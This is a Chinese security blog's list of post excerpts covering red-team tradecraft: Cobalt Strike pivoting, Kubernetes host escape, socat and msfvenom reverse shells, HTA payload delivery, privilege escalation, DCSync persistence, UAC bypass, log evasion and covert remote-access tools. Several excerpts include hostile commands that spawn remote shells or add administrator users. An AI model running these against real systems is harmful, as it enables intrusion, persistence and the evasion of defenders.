摘要: 各种上线 拿下一台边缘机器,其有多块网卡,内网机器都不出网。这种情况下拿这个边缘机器做中转,就可以上线。 拓扑大致如下: 先使用http Beacon创建监听器,上线Web服务器: CS上线 方法一:代理转发-转发上线(反向连接) 注:反向连接需要考虑防火墙放行端口问题 1.配置 Socks 代理 阅读全文
posted @ 2025-12-04 21:47 shinianyunyan 阅读(39) 评论(0) 推荐(0)
摘要: 部署struts靶场 随便一个node上执行即可部署 # 拉取靶场镜像,并部署 kubectl create deployment struts --image=vulhub/struts2:2.3.28 # 设置开放一个对外端口8080,转发到内部pod的8080端口,并开放一个30000 - 3 阅读全文
posted @ 2025-12-04 16:30 shinianyunyan 阅读(21) 评论(0) 推荐(0)
摘要: 访问目标站点 可以看到登录页有一个跳过,点击可以直接跳过登录 然后直接上传yaml文件内容,创建pod即可 内容为拉取一个nginx镜像,命名为ginkgo,并将宿主机的根目录挂载到镜像的 /mnt 目录下 创建成功 访问该pod,进入后访问/mnt目录,可以看到该目录下的内容就是宿主机的内容 写入 阅读全文
posted @ 2025-12-04 16:30 shinianyunyan 阅读(17) 评论(0) 推荐(0)
摘要: 云服务 对象存储 类别 服务商 国内云服务商 阿里云、腾讯云、华为云、天翼云、UCloud、金山云 国外云服务商 AWS(亚马逊)、GCP(Google)、Azure(微软)、IBM云 各个云厂商对云服务的叫法都不统一,这里以AWS为例。 S3 对象存储Simple Storage Service, 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(24) 评论(0) 推荐(0)
摘要: 全部机器 预配置 分别重命名 hostnamectl set-hostname master hostnamectl set-hostname node1 hostnamectl set-hostname node2 网络配置 cat <<EOF >>/etc/hosts 192.168.120.1 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(6) 评论(0) 推荐(0)
摘要: 常用插件 imageinfo:显示目标镜像的摘要信息,这常常是第一步,获取内存的操作系统类型及版本,之后可以在 –profile 中带上对应的操作系统,后续操作都要带上这一参数 pslist:该插件列举出系统进程,但它不能检测到隐藏或者解链的进程,psscan可以 pstree:以树的形式查看进程列 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(22) 评论(0) 推荐(0)
摘要: 基本指令 指定网络接口 -i INTERFACE 先查看当前设备的网卡信息 ┌──(root㉿kali)-[/home/kali] └─# ip a s 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(10) 评论(0) 推荐(0)
摘要: title: 使用方法及常用命令 updated: 2024-08-28T20:00:39 created: 2023-05-12T16:51:48 sqlmap工具注入[1] 1.sqlmap介绍 1.1.sqlmap简介 1.1.1.sqlmap简介 Sqlmap是一个开源的渗透测试工具,可以用 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(17) 评论(0) 推荐(0)
摘要: 正向连接 普通通信 攻击机 socat TCP:<TARGET-IP>:<TARGET-PORT> - 目标机 windows socat TCP-L:<PORT> EXEC:powershell.exe,pipes linux socat TCP-L:<PORT> EXEC:"bash -li" 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(6) 评论(0) 推荐(0)
摘要: resources 0x01 PEASS-ng 介绍 PEAS-ng 是一款适用于 Windows 和 Linux/Unix* 和 MacOS 的权限提升工具。 项目地址:https://github.com/carlospolop/PEASS-ng PEAS-ng 工具搜索可能的本地权限提升路径, 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(23) 评论(0) 推荐(0)
摘要: Nishang 项目下载地址:https://github.com/samratashok/nishang nishang的简单介绍 Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。 nishang下载后的目录列表如下图所示,每个目录对应一个功 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(17) 评论(0) 推荐(0)
摘要: 创建载荷 标准语法 msfvenom -p <PAYLOAD> <OPTIONS> 例如,要生成 exe 格式的 Windows x64 反向 Shell,可以使用: msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOS 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(30) 评论(0) 推荐(0)
摘要: 密码分析-字典生成 cewl 爬取网站并提取字符串或关键词,搜集可能的密码形成字典 常用命令: cewl -w list.txt -d 5 -m 5 http://target.com -w 将内容写入文件。在这种情况下,list.txt。 -m 5 聚集长度为 5 个字符或更长的字符串(单词) - 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(58) 评论(0) 推荐(0)
摘要: 爆破hash 基本语法 john [options] [file path] john : 调用 John the Ripper 程序 [options] :指定您想要使用的选项 [file path] : 包含您要破解的hash值的文件;如果它在同一目录下,您不需要指定路径,只需文件名即可。 自动 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(58) 评论(0) 推荐(0)
摘要: title: 使用方法及常用命令 updated: 2023-06-22T20:43:08 created: 2023-06-02T20:28:13 Hydra 使用教程 一、参数 -l 指定用户名 -p 指定密码 -L 指定用户名字典 -P 指定密码字典 -C 指定所用格式为“user:passw 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(60) 评论(0) 推荐(0)
摘要: 基本语法 crackmapexec <协议> <目标IP或范围> [选项] 示例: crackmapexec smb 192.168.1.0/24 -u admin -p 'P@ssw0rd!' 常用协议与模块 1. SMB 协议 基础命令 # 枚举共享 crackmapexec smb 192.1 阅读全文
posted @ 2025-12-04 16:29 shinianyunyan 阅读(33) 评论(0) 推荐(0)
摘要: ADCS配置启用基于SSL的LDAP(LDAPS) 打开AD CS,选择证书颁发机构 选择证书模板,右键管理 选择Kerberos身份验证,右键 复制模板 然后会有一个Kerberos身份验证的副本,右键更改名称,更改为LDAPS 选择LDAPS,右键属性 设置模板属性,请求处理——>允许导出私钥( 阅读全文
posted @ 2025-12-04 16:27 shinianyunyan 阅读(19) 评论(0) 推荐(0)
摘要: 搭建Exchange服务器 环境安装准备 1、Windows Server 2012 R2以管理员身份运行Windows Powershell,安装必需的 Windows组件: Install-WindowsFeature NET-Framework-45-Features, Server-Medi 阅读全文
posted @ 2025-12-04 16:27 shinianyunyan 阅读(29) 评论(0) 推荐(0)
摘要: 安装ADCS证书服务 由于证书服务特性(不能更改计算机名称、网络参数),因此在部署证书服务器时建议独立部署,ADCS证书服务不能和域控是同一台服务器,这里用的一台加入域的Server2016搭建 1、以 Enterprise Admins 组和根域的 Domain Admins 组的成员身份登录。 阅读全文
posted @ 2025-12-04 16:27 shinianyunyan 阅读(25) 评论(0) 推荐(0)
摘要: 一切提权的基础是已经拿到shell!!! 拿到shell之后可以使用 Python 启动一个功能更强大的 bash shell: python3 -c 'import pty;pty.spawn("/bin/bash")' python -c 'import pty;pty.spawn("/bin/ 阅读全文
posted @ 2025-12-04 16:27 shinianyunyan 阅读(13) 评论(0) 推荐(0)
摘要: Windows提权 基础前导 Windows中有很多原因导致提权的漏洞,下表是关于Windows中用户、权限、用户组、提权流程等汇总: 主分类 子分类 核心描述 攻击关联信息 提权漏洞原因 Windows服务/计划任务配置错误 服务可执行文件路径可写、任务权限设置不当 劫持服务→获取SYSTEM权限 阅读全文
posted @ 2025-12-04 16:27 shinianyunyan 阅读(81) 评论(0) 推荐(0)
摘要: Linux 常用命令汇总 分类 命令/操作 描述/用途 Linux 系统信息 ls /etc/*-release 查看发行版本信息文件 uname -a 显示系统内核和硬件架构信息 ls -alh /var/mail 查看系统邮件目录 ls -lh /usr/bin/ /sbin/ 列出已安装应用程 阅读全文
posted @ 2025-12-04 16:26 shinianyunyan 阅读(16) 评论(0) 推荐(0)
摘要: 定义 如果单纯的部署一个C2服务器那么很容易被识别,然后被关停,但如果使用重定向器,那么就可以对服务器进行一定程度的隐藏: C2 和重定向器与受害者回连的示意图 但只是这样是不够的,一旦被识别还是容易被关停,那么可以使用防火墙进行隔离,防止其他访问: C2 服务器和重定向器应该如何交互的示意图 设置 阅读全文
posted @ 2025-12-04 16:26 shinianyunyan 阅读(9) 评论(0) 推荐(0)
摘要: 简介 FRP 是一款专注于内网穿透的高性能反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。采用 Golang 编写,跨平台支持,无额外依赖。 项目资源: GitHub 仓库:https://github.com/fatedier/frp 官方文档:文档 | frp 网络环境分类 阅读全文
posted @ 2025-12-04 16:26 shinianyunyan 阅读(42) 评论(0) 推荐(0)
摘要: 实验环境 网络环境 域名与ip配置 域名 OR 角色 IP 网络划分 jump.thm.com 192.168.0.13310.10.233.45 Net 1 and Net 2 uploader.thm.com 172.20.0.100 Net 1 flag.thm.com ***.**.*.** 阅读全文
posted @ 2025-12-04 16:26 shinianyunyan 阅读(11) 评论(0) 推荐(0)
摘要: 初始权限获取 一般是通过RCE、webshell等方法建立一个初始shell,拥有的也是一个权限较低的网站服务用户shell,建立连接后为了后续的攻击利用就需要进行权限维持。 PS:常见的反弹shell指令生成站点 reverse-shell 如果遇到目标环境无法反弹shell,最后测试得出只开放了 阅读全文
posted @ 2025-12-04 16:26 shinianyunyan 阅读(19) 评论(0) 推荐(0)
摘要: 篡改无权限账户 无权限用户不会像管理员哪有受到太多监控,并以某种方式授予它们某种管理权限。 分配组成员 前提条件:获得了一个无权限或低权限的未授权账户 管理员组 让未授权用户获得管理员权限的直接方法是将其添加到管理员组。可以通过以下命令轻松实现: net localgroup administrat 阅读全文
posted @ 2025-12-04 16:26 shinianyunyan 阅读(28) 评论(0) 推荐(0)
摘要: 前言 权限最高的账户或组并不总是最适合用于持久化的,特权组比其他组受到更严格的监控,任何被归类为受保护组的组,如域管理员或企业管理员,都会受到额外的安全审查。 网络拓扑 与 thm 相关的示例/实验都使用的下面这个网络拓扑: 利用 DC Sync 持久化 概念&原理 DCSync 工作流程 发现与请 阅读全文
posted @ 2025-12-04 16:25 shinianyunyan 阅读(19) 评论(0) 推荐(0)
摘要: 检测方法 每个IPS/IDS都有特定的检测规则,通过规则进行监控流量,比如snort的规则包含以下信息: 动作:动作示例包括 警报 、记录、通过、丢弃和 拒绝 。 协议:TCP、UDP、ICMP 或 IP。 源 IP/源端口:!10.10.0.0/16 any 指的是不属于类 B 子网 10.10. 阅读全文
posted @ 2025-12-04 16:25 shinianyunyan 阅读(21) 评论(0) 推荐(0)
摘要: UAC原理 UAC设置 根据用户的安全需求,UAC 可以配置为四个不同的通知级别: 始终通知: 在更改 Windows 设置或程序尝试安装应用程序或更改计算机时通知并提示用户进行授权。 仅在程序尝试更改我的计算机时通知我: 在程序尝试安装应用程序或更改计算机时通知并提示用户进行授权。管理员在更改 W 阅读全文
posted @ 2025-12-04 16:25 shinianyunyan 阅读(32) 评论(0) 推荐(0)
摘要: 前置基础 虽然很容易想到直接删除日志来规避日志记录,但一般现代环境中日志会启用日志转发,将日志转发到其他设备进行保护,就算是在转发前将日志删除了,也不能规避被发现,首先没有日志就很可疑,然后篡改/删除日志也有对应的日志记录: 事件 ID 目的 1102 Windows 安全审计日志被清除时的日志 1 阅读全文
posted @ 2025-12-04 16:25 shinianyunyan 阅读(28) 评论(0) 推荐(0)
摘要: HTA 法一:通过投送payload,反弹shell 使用msfvenom生成payload: user@machine$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm. 阅读全文
posted @ 2025-12-04 16:25 shinianyunyan 阅读(28) 评论(0) 推荐(0)
摘要: 基本思想 “就地取材”、“本地化存活”是一个有效规避检测的方法,通过利用win自带、由微软签发的的工具、命令、脚本等进行攻击利用能使攻击更加隐蔽,不易发现,常用的工具集如下: Windows Sysinternals 工具集:包含多个类别,包括:磁盘管理、进程管理、网络工具、系统信息、安全工具;访问 阅读全文
posted @ 2025-12-04 16:25 shinianyunyan 阅读(21) 评论(0) 推荐(0)
摘要: GoToHTTP使用 使用cs或者其他工具将文件上传到目标机器 运行该文件 shell GotoHTTP_x64.exe 在运行目录下会生成一个配置文件: 查看配置文件里面有连接地址和账号密码: shell type gotohttp.ini 使用网页连接 成功控制目标机器 阅读全文
posted @ 2025-12-04 16:25 shinianyunyan 阅读(13) 评论(0) 推荐(0)
摘要: 安装RustDESK 通过cs上传到目标机器 运行程序 找到配置文件 shell type C:\Users\用户名\AppData\Roaming\RustDesk\config\RustDesk.toml 可以看到没有密码,这个时候需要手写这个密码,然后重启工具; 将这段内容复制下来,然后再本地 阅读全文
posted @ 2025-12-04 16:24 shinianyunyan 阅读(21) 评论(0) 推荐(0)
摘要: 软件安装 与向日葵不同,这个不需要修改注册表项,在命令行使用 /S 参数即可静默安装,没有UAC。 PS:但至少需要管理员才能没有UAC,如果是普通用户依然会显示UAC ToDesk1.exe /S 配置文件修改 todesk的密码没有办法通过解码得到明文,但可以找到目标主机ToDesk中的temp 阅读全文
posted @ 2025-12-04 16:24 shinianyunyan 阅读(17) 评论(0) 推荐(0)
摘要: 安装向日葵 安装时会有一个UAC的弹窗,所以需要绕过UAC,在安装向日葵时有一个以绿色版运行的选项,选择后在注册表中会创建一个键值,之后再运行的时候就可以直接进入软件,不需要进行安装。 UAC绕过 创建一个注册表文件 1.reg,内容如下: Windows Registry Editor Versi 阅读全文
posted @ 2025-12-04 16:24 shinianyunyan 阅读(41) 评论(0) 推荐(0)